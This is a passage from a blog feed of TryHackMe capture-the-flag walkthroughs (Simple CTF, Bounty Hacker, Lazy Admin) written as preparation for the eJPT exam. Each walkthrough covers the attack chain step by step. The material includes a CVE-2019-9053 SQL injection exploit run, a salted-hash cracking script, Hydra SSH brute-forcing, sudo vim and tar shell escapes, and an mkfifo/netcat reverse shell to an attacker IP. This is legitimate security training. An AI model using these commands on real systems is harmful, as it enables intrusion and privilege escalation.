2222/tcp open ssh OpenSSH 7.2p2 Ubuntu Key findings:\nPort 21: vsftpd 3.0.3 with anonymous login enabled — first vector to explore Port 80: Apache with robots.txt mentioning /openemr-5_0_1_3 — possible CMS Port 2222: SSH running on non-standard port — admins sometimes move SSH to avoid bots, but it\u0026rsquo;s not a real security measure Anonymous FTP enumeration Anonymous FTP login means we can connect without credentials:\nftp 10.201.40.102 21 Name: anonymous 230 Login successful. ftp\u0026gt; ls 229 Entering Extended Passive Mode (|||43213|) Passive mode issue: the FTP server enters extended passive mode but times out when listing directories. This is common when there are network restrictions between client and server. Anonymous FTP doesn\u0026rsquo;t give us direct useful information here, but confirms lax security configuration on the server.\nWeb enumeration robots.txt Already detected by Nmap — we review it manually:\nUser-agent: * Disallow: / Disallow: /openemr-5_0_1_3 Possible user: the file comment mentions mike as original author. We note it for possible bruteforce later.\nFuzzing with Gobuster gobuster dir -u http://10.201.40.102 \\ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt \\ -t 50 -x php,txt,xml,html,bak /index.html (Status: 200) /robots.txt (Status: 200) /simple (Status: 301) /server-status (Status: 403) Key finding: /simple/ directory — navigating to http://10.201.40.102/simple/ we find CMS Made Simple. Reviewing the page source code we identify the version: 2.2.8.\nExploit search with Searchsploit With the CMS version identified, we search for known exploits:\nsearchsploit simple CMS 2.2.8 CMS Made Simple \u0026lt; 2.2.10 - SQL Injection | php/webapps/46635.py CVE-2019-9053 — Unauthenticated time-based SQLi in CMS Made Simple versions prior to 2.2.10. No credentials needed to exploit it, making it especially dangerous.\nExploitation CVE-2019-9053: Time-based SQL Injection The original Searchsploit exploit is written in Python 2. Since we use Python 3, we need an adapted version. The exploit uses time-based blind SQLi to extract information character by character by measuring server response times.\nInstall dependencies:\npip install requests termcolor Run the exploit pointing to the CMS directory:\npython3 exploit.py -u http://10.201.40.102/simple/ [+] Salt for password found: 1dac0d92e9fa6bb2 [+] Username found: mitch [+] Email found: admin@admin.com [+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96 How does time-based SQLi work? The exploit injects SQL queries that include SLEEP() — if the condition is true, the server takes longer to respond. By measuring these delays, the script extracts information bit by bit. Slower than direct SQLi but equally effective.\nSalted MD5 hash cracking The obtained hash is not a simple MD5 — it\u0026rsquo;s salted with 1dac0d92e9fa6bb2. This means the hash is MD5(salt + password), not simply MD5(password). Standard tools like john or hashcat require special configuration for salted hashes, so we use a custom Python3 script:\n#!/usr/bin/env python3 import hashlib, sys def try_crack(salt, target_hash, wordlist_path): target_hash = target_hash.strip().lower() with open(wordlist_path, \u0026#39;r\u0026#39;, encoding=\u0026#39;utf-8\u0026#39;, errors=\u0026#39;ignore\u0026#39;) as f: for line in f: candidate = line.rstrip(\u0026#39;\\n\u0026#39;) h = hashlib.md5((salt + candidate).encode(\u0026#39;utf-8\u0026#39;)).hexdigest() if h == target_hash: print(\u0026#34;[+] Password found:\u0026#34;, candidate) return candidate print(\u0026#34;[-] Not found in wordlist\u0026#34;) salt = sys.argv[1] target_hash = sys.argv[2] wordlist = sys.argv[3] try_crack(salt, target_hash, wordlist) python3 crack.py 1dac0d92e9fa6bb2 0c01f4468bd75d7a84c7eb73846e8d96 /usr/share/wordlists/rockyou.txt [+] Found (full match): secret Credentials obtained: mitch:secret\nPost-exploitation SSH access With the obtained credentials, we access via SSH on the non-standard port:\nssh mitch@10.201.40.102 -p 2222 Welcome to Ubuntu 16.04.6 LTS mitch@Machine:~$ Stabilize the shell:\nexport TERM=xterm export SHELL=bash Identity and context id uid=1001(mitch) gid=1001(mitch) groups=1001(mitch) User flag cat ~/user.txt User flag: G00d j0b, keep up!\nSystem user enumeration ls /home mitch sunbath Another user exists: sunbath. Noted for possible lateral movement.\nSUID binary search find / -perm -4000 2\u0026gt;/dev/null No exploitable SUID binaries on this machine — all found are standard system binaries. We discard this vector and move on.\nSudo enumeration sudo -l User mitch may run the following commands on Machine: (root) NOPASSWD: /usr/bin/vim Critical finding: mitch can run vim as root without a password. Vim has the ability to execute shell commands internally — this is direct escalation.\nPrivilege Escalation Sudo vim abuse Vim allows executing operating system commands directly from its command mode with :!command. If we run it with sudo, those commands run as root:\nsudo vim -c \u0026#39;:!/bin/sh\u0026#39; # whoami root What does this command do?\nsudo vim opens vim with root privileges -c ':!/bin/sh' automatically executes the command :!/bin/sh on startup :! in vim executes system commands /bin/sh opens a shell — which inherits vim\u0026rsquo;s root privileges Root flag cd /root cat root.txt Root flag: W3ll d0n3. You made it!\nLessons learned Anonymous FTP in production is bad practice — Although it didn\u0026rsquo;t give direct access here, it confirms lax configurations. In real environments, anonymous FTP can expose sensitive files. Always find the exact CMS or web application version — CMS Made Simple 2.2.8 had a public SQLi. A real attacker would immediately query CVE databases after identifying the software and version. This information is in the page source code. Salted hashes require custom cracking — A simple MD5 hash is cracked with john or hashcat directly. A salted hash requires your tool to know the salt. Understanding how salted hashes work — and writing a script to crack them — is a differentiating skill. SSH on non-standard port is not security — Moving SSH to port 2222 only avoids basic bots. Nmap detects it in seconds with version scanning. Real security comes from SSH keys, 2FA, and service hardening. sudo -l always, always, always — In all four machines so far, sudo -l was the privesc vector or confirmed its absence. It\u0026rsquo;s the first command you should run after getting a shell. GTFOBins for sudo — Vim, less, more, nano, python, perl\u0026hellip; dozens of common tools can be used to escalate privileges if run via sudo. GTFOBins is the definitive reference. For the eJPT This machine exercises skills directly evaluated on the eJPT:\nMultiple service enumeration (FTP, HTTP, SSH) Web application version identification Public exploit usage (Searchsploit + CVE) Basic SQLi understanding Hash cracking (with and without salt) SSH access with obtained credentials Privilege escalation via sudo misconfigurations Approximate solving time: 40-60 minutes — time-based SQLi is slow by nature.\nReferences Simple CTF — TryHackMe CVE-2019-9053 — NVD GTFOBins — vim PayloadsAllTheThings — SQL Injection ","permalink":"https://r3df0x1-c.github.io/f0x1-blog/en/walkthroughs/road-to-ejpt/simple-ctf/","summary":"\u003ch2 id=\"summary\"\u003eSummary\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSimple CTF\u003c/strong\u003e is the fourth machine in the \u003cem\u003eRoad to eJPTv2\u003c/em\u003e series and the most technically varied so far. It introduces three new vectors: \u003cstrong\u003eanonymous FTP access\u003c/strong\u003e, \u003cstrong\u003eSQLi exploitation with a real CVE\u003c/strong\u003e (CVE-2019-9053) against CMS Made Simple, and \u003cstrong\u003eprivilege escalation via sudo vim\u003c/strong\u003e. Additionally, the obtained hash is salted, requiring a custom cracking script — a differentiating skill.\u003c/p\u003e\n\u003ctable\u003e\n \u003cthead\u003e\n \u003ctr\u003e\n \u003cth\u003eAttribute\u003c/th\u003e\n \u003cth\u003eValue\u003c/th\u003e\n \u003c/tr\u003e\n \u003c/thead\u003e\n \u003ctbody\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003ePlatform\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eTryHackMe\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eDifficulty\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eEasy\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eOS\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eLinux\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eRoom\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003e\u003ca href=\"https://tryhackme.com/room/easyctf\"\u003eSimple CTF\u003c/a\u003e\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eSkills\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eFTP Enum, Web Enum, SQLi, Hash Cracking, SSH, Sudo Privesc\u003c/td\u003e\n \u003c/tr\u003e\n \u003c/tbody\u003e\n\u003c/table\u003e\n\u003ch3 id=\"-video-version\"\u003e🎥 Video version\u003c/h3\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/fC-5pqH2h54?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n \u003c/div\u003e\n\n\u003cblockquote\u003e\n\u003cp\u003eIf you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\u003c/p\u003e","title":"Simple CTF"},{"content":"Summary Bounty Hacker is the fifth machine in the Road to eJPTv2 series and one of the most straightforward in terms of attack flow. Anonymous FTP doesn\u0026rsquo;t just confirm lax configurations — this time it directly delivers a password wordlist and the target username. With that data, Hydra does the heavy lifting against SSH. The escalation via sudo tar introduces a new GTFOBins binary worth knowing.\nAttribute Value Platform TryHackMe Difficulty Easy OS Linux Room Bounty Hacker Skills FTP Enum, SSH Bruteforce, Sudo Privesc (tar) 🎥 Video version If you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\nTools used nmap — port and service enumeration ftp — anonymous access and file download hydra — SSH bruteforce with wordlist obtained from FTP ssh — access with obtained credentials Solution overview Nmap reveals FTP (21), SSH (22) and HTTP (80) Anonymous FTP exposes two files: task.txt (user lin) and locks.txt (password wordlist) Hydra SSH bruteforce with lin and locks.txt → password RedDr4gonSynd1cat3 SSH access as lin → user flag sudo -l reveals lin can run /bin/tar as root sudo tar abuse with shell payload → root Reconnaissance Connectivity check ping -c 1 10.67.160.220 64 bytes from 10.67.160.220: icmp_seq=1 ttl=62 time=70.0 ms TTL=62 → target is Linux. The TTL is 62 instead of the usual 60 — this happens when there are one or two network hops between attacker and target. Still Linux.\nNmap port scan Initial sweep of all TCP ports:\nnmap 10.67.160.220 -n -Pn -sS -p- --open --min-rate=5000 -oG allTCPports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http Note on --open: this flag filters output showing only open ports, ignoring filtered or closed ones. Useful to avoid noise on machines with many filtered ports — like this one, which had 55531 filtered ports.\nTargeted scan with version detection and scripts:\nnmap 10.67.160.220 -n -Pn -sS -sCV -p21,22,80 --min-rate=5000 -oN scanBounty.txt PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.5 | ftp-anon: Anonymous FTP login allowed (FTP code 230) 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 80/tcp open http Apache httpd 2.4.41 (Ubuntu) Key findings:\nPort 21: vsftpd with anonymous login enabled — first vector to explore Port 22: SSH — potential bruteforce target if we find credentials Port 80: Apache — web review pending Anonymous FTP enumeration ftp 10.67.160.220 21 Name: anonymous 230 Login successful. ftp\u0026gt; ls -rw-rw-r-- 1 ftp ftp 418 Jun 07 2020 locks.txt -rw-rw-r-- 1 ftp ftp 68 Jun 07 2020 task.txt Two accessible files. We download them:\nftp\u0026gt; get locks.txt ftp\u0026gt; get task.txt We review their contents:\ntask.txt — task list signed by user lin:\n1.) Protect Vicious. 2.) Get Trophies on the shelf.\nCritical finding: the file is signed by lin — we have a valid system username.\nlocks.txt — list of possible passwords (custom wordlist):\nrEddrAGON ReDdr4gON RedDr4gonSynd1cat3 Ideal attacker scenario: the anonymous FTP server just handed us the username (lin) and its password wordlist (locks.txt). This is a critical misconfiguration — never expose sensitive files on anonymous FTP.\nExploitation SSH bruteforce with Hydra With the username and wordlist in hand, we launch Hydra against SSH:\nhydra -l lin -P ./locks.txt ssh://10.67.160.220 -t 4 Flag justification:\n-l lin single user (already known from task.txt) -P locks.txt custom wordlist obtained from FTP -t 4 4 parallel tasks (higher can cause SSH lockouts) [22][ssh] host: 10.67.160.220 login: lin password: RedDr4gonSynd1cat3 Credentials obtained: lin:RedDr4gonSynd1cat3\nThe attack finished in 10 seconds because the wordlist was small and targeted. This is the difference between a generic wordlist (rockyou.txt with 14 million entries) and a directed one — when you have the right wordlist, bruteforce is almost instant.\nSSH access ssh lin@10.67.160.220 Welcome to Ubuntu 20.04.6 LTS lin@ip-10-67-160-220:~$ Post-exploitation User flag cat ~/Desktop/user.txt User flag: THM{CR1M3_SyNd1C4T3}\nSudo enumeration sudo -l User lin may run the following commands on ip-10-67-160-220: (root) /bin/tar Critical finding: lin can run tar as root without a password. tar is a file archiver that under normal conditions should not have sudo permissions. GTFOBins documents exactly how to abuse this.\nPrivilege Escalation Sudo tar abuse tar has an -I flag that allows specifying an external program for compression/decompression. We can abuse this to execute arbitrary commands with root privileges:\nsudo tar xf /dev/null -I \u0026#39;/bin/sh -c \u0026#34;sh \u0026lt;\u0026amp;2 1\u0026gt;\u0026amp;2\u0026#34;\u0026#39; # whoami root What does this command do?\nsudo tar runs tar with root privileges xf /dev/null attempts to extract from /dev/null (empty file — doesn\u0026rsquo;t fail but does nothing real) -I '/bin/sh -c \u0026quot;sh \u0026lt;\u0026amp;2 1\u0026gt;\u0026amp;2\u0026quot;' specifies a /bin/sh shell as the \u0026ldquo;decompressor\u0026rdquo; \u0026lt;\u0026amp;2 1\u0026gt;\u0026amp;2 redirects stdin from stderr and stdout to stderr — trick to get an interactive shell from tar Root flag cd /root cat root.txt Root flag: THM{80UN7Y_h4cK3r}\nLessons learned Anonymous FTP can be more dangerous than it looks — In previous machines (Simple CTF) anonymous FTP didn\u0026rsquo;t give directly useful information. Here it delivered username and wordlist. Always list and download everything available on anonymous FTP before moving to the next vector. A targeted wordlist is exponentially more effective — locks.txt had 26 passwords. rockyou.txt has 14 million. Hydra found the password in 10 seconds with the right wordlist. In a real pentest, collecting target-specific information before launching bruteforce attacks makes all the difference. sudo -l is still the first post-shell command — Four machines in a row with privesc via sudo. The pattern is consistent: always the first thing you check. GTFOBins isn\u0026rsquo;t just Python and Vim — tar, find, awk, perl, nmap\u0026hellip; dozens of common binaries have escape techniques documented on GTFOBins. Learn to search there when you find an unusual binary with sudo or SUID. --open in Nmap is your friend — On machines with many filtered ports, the --open flag cleans output and focuses you on what matters. Use it when the first scan shows thousands of filtered ports. For the eJPT This machine exercises skills directly evaluated on the eJPT:\nAnonymous FTP enumeration with file extraction Directed SSH bruteforce with Hydra Privilege escalation via sudo misconfiguration Using GTFOBins as a privesc reference Approximate solving time: 15-20 minutes — one of the fastest machines in the series once you understand the flow.\nReferences Bounty Hacker — TryHackMe GTFOBins — tar Hydra documentation ","permalink":"https://r3df0x1-c.github.io/f0x1-blog/en/walkthroughs/road-to-ejpt/bounty-hacker/","summary":"\u003ch2 id=\"summary\"\u003eSummary\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBounty Hacker\u003c/strong\u003e is the fifth machine in the \u003cem\u003eRoad to eJPTv2\u003c/em\u003e series and one of the most straightforward in terms of attack flow. Anonymous FTP doesn\u0026rsquo;t just confirm lax configurations — this time it \u003cstrong\u003edirectly delivers\u003c/strong\u003e a password wordlist and the target username. With that data, Hydra does the heavy lifting against SSH. The escalation via \u003ccode\u003esudo tar\u003c/code\u003e introduces a new GTFOBins binary worth knowing.\u003c/p\u003e\n\u003ctable\u003e\n \u003cthead\u003e\n \u003ctr\u003e\n \u003cth\u003eAttribute\u003c/th\u003e\n \u003cth\u003eValue\u003c/th\u003e\n \u003c/tr\u003e\n \u003c/thead\u003e\n \u003ctbody\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003ePlatform\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eTryHackMe\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eDifficulty\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eEasy\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eOS\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eLinux\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eRoom\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003e\u003ca href=\"https://tryhackme.com/room/cowboyhacker\"\u003eBounty Hacker\u003c/a\u003e\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eSkills\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eFTP Enum, SSH Bruteforce, Sudo Privesc (tar)\u003c/td\u003e\n \u003c/tr\u003e\n \u003c/tbody\u003e\n\u003c/table\u003e\n\u003ch3 id=\"-video-version\"\u003e🎥 Video version\u003c/h3\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/-5pLjSCvwGo?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n \u003c/div\u003e\n\n\u003cblockquote\u003e\n\u003cp\u003eIf you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\u003c/p\u003e","title":"Bounty Hacker"},{"content":"Summary Lazy Admin is the sixth machine in the Road to eJPTv2 series and the most elaborate so far in terms of attack chain. There\u0026rsquo;s no single vector — you have to chain: two-layer fuzzing to find the CMS, credential extraction from an exposed MySQL backup, MD5 hash cracking, admin panel access, reverse shell upload, and an indirect privilege escalation via sudo Perl that modifies an intermediate script.\nAttribute Value Platform TryHackMe Difficulty Easy OS Linux Room Lazy Admin Skills Web Enum, CMS Exploitation, Hash Cracking, File Upload, Sudo Privesc (Perl) 🎥 Video version If you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\nTools used nmap — port and service enumeration gobuster — two-layer directory fuzzing wget — MySQL backup download john — MD5 hash cracking netcat — reverse shell listener Solution overview Nmap reveals SSH (22) and HTTP (80) with Apache 2.4.18 Gobuster discovers /content/ — SweetRice CMS version 1.5.1 Second fuzzing on /content/ discovers /content/inc/ with exposed MySQL backup Backup contains user manager and MD5 hash: 42f749ade7f9e195bf475f37a44cafcb John cracks the hash → Password123 Access to SweetRice admin panel at /content/as/ PHP5 reverse shell upload via Media Center → shell as www-data sudo -l reveals www-data can run /usr/bin/perl /home/itguy/backup.pl backup.pl runs /etc/copy.sh — we modify copy.sh with mkfifo reverse shell Run script with sudo → root Reconnaissance Connectivity check ping -c 1 10.66.153.42 64 bytes from 10.66.153.42: icmp_seq=1 ttl=62 time=68.1 ms TTL=62 → target is Linux. Same as Bounty Hacker, TTL of 62 indicates one or two network hops between attacker and target.\nNmap port scan Initial sweep of all TCP ports:\nnmap 10.66.153.42 -n -Pn -sS -p- --open --min-rate=5000 -oG allTCPports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Only two ports. The entire attack goes through the web.\nTargeted scan with version detection and scripts:\nnmap 10.66.153.42 -n -Pn -sS -sCV -p22,80 --min-rate=5000 -oN escaneoLazy.txt PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 80/tcp open http Apache httpd 2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Key findings:\nPort 80: Apache 2.4.18 showing Ubuntu\u0026rsquo;s default page. Hidden content waiting to be discovered with fuzzing. Port 22: SSH active — possible vector if we obtain valid credentials. Web Enumeration First fuzzing layer gobuster dir -u http://10.66.153.42 \\ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \\ -x php,html,txt,bak,xml /index.html (Status: 200) /content (Status: 301) Finding: /content/ directory containing SweetRice CMS version 1.5.1. This gives us a concrete target: search for known vulnerabilities in that specific version.\nSecond fuzzing layer on /content/ The first fuzzing only scratched the surface. We fuzz recursively inside /content/:\ngobuster dir -u http://10.66.153.42/content \\ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \\ -x html,php,css,xml,bak /index.php (Status: 200) /images (Status: 301) /js (Status: 301) /inc (Status: 301) /as (Status: 301) /_themes (Status: 301) /attachment (Status: 301) Two critical findings:\n/content/as/ → SweetRice administration panel /content/inc/ → directory with exposed internal CMS files Exploring /inc/ We access http://10.66.153.42/content/inc/ and find the directory with indexing enabled:\nInside we find the mysql_backup/ subdirectory with a complete database backup. An exposed database backup on a web server is a critical vulnerability — it can contain credentials, user data, and system configuration.\nwget http://10.66.153.42/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql Credential extraction from backup We search for passwords inside the downloaded file:\ncat mysql_bakup_20191129023059-1.5.1.sql | grep passwd s:6:\u0026#34;passwd\u0026#34;;s:32:\u0026#34;42f749ade7f9e195bf475f37a44cafcb\u0026#34; Credentials found:\nUsername: manager MD5 hash: 42f749ade7f9e195bf475f37a44cafcb Hash cracking with John We save the hash to a file and run John with rockyou:\necho \u0026#34;42f749ade7f9e195bf475f37a44cafcb\u0026#34; \u0026gt; manager.hash john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt manager.hash Password123 (?) Full credentials: manager:Password123\nExploitation Admin panel access With the cracked credentials we access the SweetRice panel:\nhttp://10.66.153.42/content/as/ Credentials manager:Password123 work. We get full access to the CMS dashboard:\nReverse Shell via Media Center SweetRice allows file uploads from the Media Center section. We upload a PHP5 reverse shell (.php5 or .phtml to bypass possible filters).\nWe set up a listener:\nnc -nlvp 4545 We upload the reverse shell from Media Center and navigate to the uploaded file URL. We receive the connection:\nconnect to [192.168.149.0] from (UNKNOWN) [10.66.153.42] 45420 uid=33(www-data) gid=33(www-data) groups=33(www-data) Shell stabilization This machine has Python3 available — we use the full stabilization method:\nwhich python3 python3 -c \u0026#39;import pty; pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; # Ctrl + Z stty raw -echo; fg reset xterm export TERM=xterm export SHELL=bash stty rows 40 cols 184 Why is this method better than just export SHELL=bash? pty.spawn creates a full pseudo-terminal, enabling Tab autocomplete, command history, and editors like nano or vi. It\u0026rsquo;s the most complete stabilization available without additional tools.\nPost-exploitation User enumeration cat /etc/passwd | grep bash root:x:0:0:root:/root:/bin/bash itguy:x:1000:1000:THM-Chal:/home/itguy:/bin/bash System user: itguy.\nUser flag cd /home/itguy cat user.txt User flag: THM{63e5bce9271952aad1113b6f1ac28a07}\nInteresting files in itguy\u0026rsquo;s home ls -l /home/itguy -rw-r--r-x 1 root root 47 Nov 29 2019 backup.pl -rw-rw-r-- 1 itguy itguy 16 Nov 29 2019 mysql_login.txt We review backup.pl:\ncat backup.pl #!/usr/bin/perl system(\u0026#34;sh\u0026#34;, \u0026#34;/etc/copy.sh\u0026#34;); Key finding: backup.pl is a Perl script owned by root that executes /etc/copy.sh. If we can run backup.pl with sudo AND modify copy.sh, we have indirect escalation.\nSudo enumeration sudo -l User www-data may run the following commands on THM-Chal: (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl Attack plan confirmed: www-data can run backup.pl as root. backup.pl runs /etc/copy.sh. If /etc/copy.sh is writable by www-data, we can inject a reverse shell there and execute it as root via sudo perl backup.pl.\nWe verify /etc/copy.sh permissions:\nls -l /etc/copy.sh -rw-r--rwx 1 www-data www-data 81 Nov 29 2019 /etc/copy.sh /etc/copy.sh has world-writable permissions (rwx) — www-data can write to it. The chain is complete.\nPrivilege Escalation Escalation chain: sudo → Perl → Shell script The escalation works in two steps:\nModify /etc/copy.sh to execute a reverse shell Run backup.pl with sudo — which will call the modified copy.sh as root Step 1: Modify /etc/copy.sh We set up a listener on a new terminal:\nnc -nlvp 5555 We replace copy.sh content with an mkfifo reverse shell:\necho \u0026#34;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2\u0026gt;\u0026amp;1|nc 192.168.149.0 5555 \u0026gt;/tmp/f\u0026#34; \u0026gt; /etc/copy.sh Step 2: Run backup.pl with sudo sudo /usr/bin/perl /home/itguy/backup.pl On our listening terminal we receive the connection as root:\n# whoami root Root flag cd /root cat root.txt Root flag: THM{6637f41d0177b6f37cb20d775124699f}\nLessons learned Single-layer fuzzing may not be enough — The first gobuster found /content/. Without the second fuzzing inside /content/, we would never have found /content/inc/ with the MySQL backup. On complex applications, always fuzz recursively on the most interesting directories. Database backups should never be in the webroot — A publicly accessible .sql file can contain credentials, user data, and critical system configuration. In a real pentest, this is a critical finding that gets reported immediately. Indirect escalation requires understanding the full chain — Here it wasn\u0026rsquo;t sudo binary → shell directly. It was sudo perl → perl script → shell script → shell. Seeing the complete chain before executing is fundamental. Intermediate file permissions matter as much as direct ones — backup.pl was owned by root and unmodifiable. But copy.sh had world permissions (rwx). Security of the chain is only as strong as its weakest link. pty.spawn vs export SHELL=bash — When Python3 is available, always use full stabilization with pty.spawn. It gives you a functional shell with all terminal controls. Without this, commands like sudo -l can behave erratically. For the eJPT This machine exercises skills directly evaluated on the eJPT:\nMulti-layer web enumeration with Gobuster CMS identification and exploitation Credential extraction from exposed files MD5 hash cracking with John the Ripper Reverse shell upload via web admin panels Indirect privilege escalation via sudo + chained scripts File permission analysis to identify write vectors Approximate solving time: 45-60 minutes — most of the time in two-layer fuzzing and understanding the escalation chain.\nReferences Lazy Admin — TryHackMe GTFOBins — perl SweetRice CMS John the Ripper documentation PayloadsAllTheThings — Reverse Shell ","permalink":"https://r3df0x1-c.github.io/f0x1-blog/en/walkthroughs/road-to-ejpt/lazy-admin/","summary":"\u003ch2 id=\"summary\"\u003eSummary\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eLazy Admin\u003c/strong\u003e is the sixth machine in the \u003cem\u003eRoad to eJPTv2\u003c/em\u003e series and the most elaborate so far in terms of attack chain. There\u0026rsquo;s no single vector — you have to chain: two-layer fuzzing to find the CMS, credential extraction from an exposed MySQL backup, MD5 hash cracking, admin panel access, reverse shell upload, and an indirect privilege escalation via sudo Perl that modifies an intermediate script.\u003c/p\u003e\n\u003ctable\u003e\n \u003cthead\u003e\n \u003ctr\u003e\n \u003cth\u003eAttribute\u003c/th\u003e\n \u003cth\u003eValue\u003c/th\u003e\n \u003c/tr\u003e\n \u003c/thead\u003e\n \u003ctbody\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003ePlatform\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eTryHackMe\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eDifficulty\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eEasy\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eOS\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eLinux\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eRoom\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003e\u003ca href=\"https://tryhackme.com/room/lazyadmin\"\u003eLazy Admin\u003c/a\u003e\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eSkills\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eWeb Enum, CMS Exploitation, Hash Cracking, File Upload, Sudo Privesc (Perl)\u003c/td\u003e\n \u003c/tr\u003e\n \u003c/tbody\u003e\n\u003c/table\u003e\n\u003ch3 id=\"-video-version\"\u003e🎥 Video version\u003c/h3\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/0V7u0ZgdkEU?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n \u003c/div\u003e\n\n\u003cblockquote\u003e\n\u003cp\u003eIf you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\u003c/p\u003e","title":"Lazy Admin"},{"content":"Summary c4ptur3-th3-fl4g is the seventh machine of the Road to eJPTv2 series and the most different one so far. No service exploitation, no reverse shells, no privesc. It\u0026rsquo;s a pure encoding, cryptography and steganography challenge — designed to get you comfortable with data representation systems that appear constantly in CTFs and forensic analysis.\nThis room covers: leetspeak, binary, Base32, Base64, hexadecimal, ROT13, ROT47, Morse code, BCD, Brainfuck/Malbolge, audio spectrograms and image steganography.\nAttribute Value Platform TryHackMe Difficulty Easy OS N/A (encoding challenge) Room c4ptur3-th3-fl4g Skills Encoding/Decoding, Steganography, Spectrograms, Basic OSINT 🎥 Video Walkthrough If you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\nTools Used CyberChef — swiss army knife for encoding/decoding Audacity — spectrogram visualization steghide — extracting hidden data from images binwalk — analysis of composite files Solution Overview This room is divided into four sections:\nTranslations \u0026amp; Shifting — 10 encoding/decoding challenges Spectrograms — hidden message in audio frequencies Steganography — data hidden inside an image Security through obscurity — file inside another file Section 1: Translations \u0026amp; Shifting This section presents 10 encoded strings that need to be decoded. The main tool is CyberChef (https://gchq.github.io/CyberChef/), which allows applying multiple 